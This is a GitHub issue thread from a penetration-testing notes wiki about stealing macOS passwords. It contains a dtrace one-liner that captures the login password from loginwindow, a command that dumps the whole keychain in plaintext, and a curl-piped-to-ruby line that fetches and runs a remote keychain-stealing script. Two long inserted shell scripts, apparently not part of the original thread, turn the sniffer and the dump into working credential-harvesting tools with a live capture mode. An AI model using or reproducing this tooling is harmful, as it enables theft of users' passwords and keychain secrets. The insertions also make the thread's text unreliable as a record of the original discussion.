pwnwiki / pwnwiki.github.io

PwnWiki - The notes section of the pentesters mind.
http://pwnwiki.io
MIT License

OS X Password sniffing #100

Open WebBreacher opened 9 years ago

WebBreacher commented 9 years ago

Don't have time to add this in the appropriate place:

sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')
(from https://twitter.com/fel1x/status/613420320104558592)

Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt
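The text that `security dump-keychain -d` prints is one `keychain:` / `class:` / `attributes:` / `data:` record per item, which is awkward to grep through once a dump has a few hundred entries. Below is an added example, not code from this thread or from PwnWiki: a POSIX shell function that reduces such a dump to one tab-separated line per item (class, service or server, account, secret). The sample dump it runs on is constructed to match that layout; the keychain path, accounts and secrets in it are made up.

```shell
#!/bin/sh
# Added example (not code from the issue thread): turn the text that
# `security dump-keychain -d login.keychain` prints into one tab-separated
# line per item: class, service or server, account, secret.
#
# Assumes the "allow access" prompt was clicked for every item, so each
# record carries a data: section. Secrets that `security` prints as hex
# followed by a quoted string (binary data) are passed through untouched.

parse_keychain_dump() {
  awk '
    # value after the first "=", with the surrounding double quotes removed
    function unquote(s) { sub(/^[^=]*=/, "", s); gsub(/^"|"$/, "", s); return s }
    function flush() {
      if (cls != "") printf "%s\t%s\t%s\t%s\n", cls, svc, acct, sec
      cls = svc = acct = sec = ""
    }
    /^keychain:/                { flush() }          # a new item begins here
    /^class:/                   { cls = $2; gsub(/"/, "", cls) }
    /^ *"(svce|srvr)"<blob>=/   { if ($0 !~ /<NULL>/) svc = unquote($0) }
    /^ *"acct"<blob>=/          { if ($0 !~ /<NULL>/) acct = unquote($0) }
    /^data:/                    { if ((getline line) > 0) { sec = line; gsub(/^"|"$/, "", sec) } }
    END                         { flush() }
  '
}

# Constructed sample in the layout security(1) uses, trimmed to the
# attributes this parser reads; not output from a real machine.
SAMPLE_DUMP='keychain: "/Users/victim/Library/Keychains/login.keychain"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="AirPort"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="homenet"
    "desc"<blob>="AirPort network password"
    "svce"<blob>="AirPort"
data:
"hunter2"
keychain: "/Users/victim/Library/Keychains/login.keychain"
version: 512
class: "inet"
attributes:
    "acct"<blob>="bob"
    "path"<blob>=<NULL>
    "ptcl"<uint32>="htps"
    "srvr"<blob>="mail.example.com"
data:
"c0rrect-horse"'

# On a real box:  security dump-keychain -d login.keychain | parse_keychain_dump
printf '%s\n' "$SAMPLE_DUMP" | parse_keychain_dump
```

Piping the dump straight into the function avoids ever writing the plaintext file that the `&& srm keychain.txt` in the one-liner above then has to clean up.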

OJ commented 9 years ago

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

:cry: System info:

$ uname -a
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

WebBreacher commented 9 years ago

@OJ - It was on Twitter so it has to be true!

Seriously though, the first command appears to work on my MBP:

└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')
dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe

And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.

└──> $ uname -a
Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
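The two results above (OJ's "pid provider is not installed" versus "matched 1 probe") are the difference between a box where the one-liner can work and one where it cannot, and it is worth finding that out before anything is traced. As an added example, not code from this thread or from PwnWiki, here is the one-liner wrapped in a script that first lists the probe without enabling it, then strips dtrace's CPU/ID/FUNCTION:NAME columns so only the captured strings remain. It assumes root, a release with the pid provider, and nothing (for instance System Integrity Protection on 10.11 and later) preventing dtrace from attaching to loginwindow; the dtrace output it parses offline is constructed, not a real capture.

```shell
#!/bin/sh
# Added example, not from the issue thread: wrapper around the
# SecKeychainLogin dtrace one-liner. Assumes root on a macOS release whose
# pid provider works and that dtrace is allowed to attach to loginwindow.

PROBE='pid$target::SecKeychainLogin:entry'   # $target is expanded by dtrace, not the shell

# PID of the oldest process with exactly this name (loginwindow normally has one)
target_pid() { pgrep -o -x "$1"; }

# Reduce dtrace's default trace() output to one captured string per line.
# A captured line looks like (constructed):
#   2   4711         SecKeychainLogin:entry   hunter2
extract_login_secrets() {
  awk '/SecKeychainLogin:entry/ { sub(/^.*SecKeychainLogin:entry[ \t]+/, ""); print }'
}

sniff_keychain_login() {
  out=${1:-keychain-login.txt}
  pid=$(target_pid loginwindow) || { echo "loginwindow is not running" >&2; return 1; }
  # -l only lists matching probes; the description is compiled the same way,
  # so a missing pid provider is reported here instead of mid-capture.
  dtrace -l -n "$PROBE" -p "$pid" >/dev/null || return 1
  # The password is the 4th argument of SecKeychainLogin(nameLength, name,
  # passwordLength, password), which x86_64 passes in rcx; the one-liner
  # reads that register as uregs[R_ECX].
  dtrace -n "${PROBE}{trace(copyinstr(uregs[R_ECX]));}" -p "$pid" \
    | extract_login_secrets | tee "$out"
}

# Constructed dtrace output for offline demonstration; not a real capture.
SAMPLE_DTRACE_OUTPUT='CPU     ID                    FUNCTION:NAME
  2   4711         SecKeychainLogin:entry   hunter2
  2   4711         SecKeychainLogin:entry   correct horse battery'

case "${1:-}" in
  --live) sniff_keychain_login "$2" ;;   # sudo sh sniff.sh --live out.txt
  *)      printf '%s\n' "$SAMPLE_DTRACE_OUTPUT" | extract_login_secrets ;;
esac
```

Run without arguments it only parses the constructed sample; `--live` needs root on the target and will sit there until someone logs in or unlocks the screen, since that is when loginwindow calls SecKeychainLogin.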

OJ commented 9 years ago

hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).

Fun stuff though!

WebBreacher commented 9 years ago

No worries... good to know where it does/does not work too. I'm on OS X 10.9.5.

sho-luv commented 9 years ago

curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby

Co-worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again, you need to click Allow, which means you need GUI access, but I have pulled that off remotely with VNC. Not super stealthy, but gets the job done.

Leon Johnson
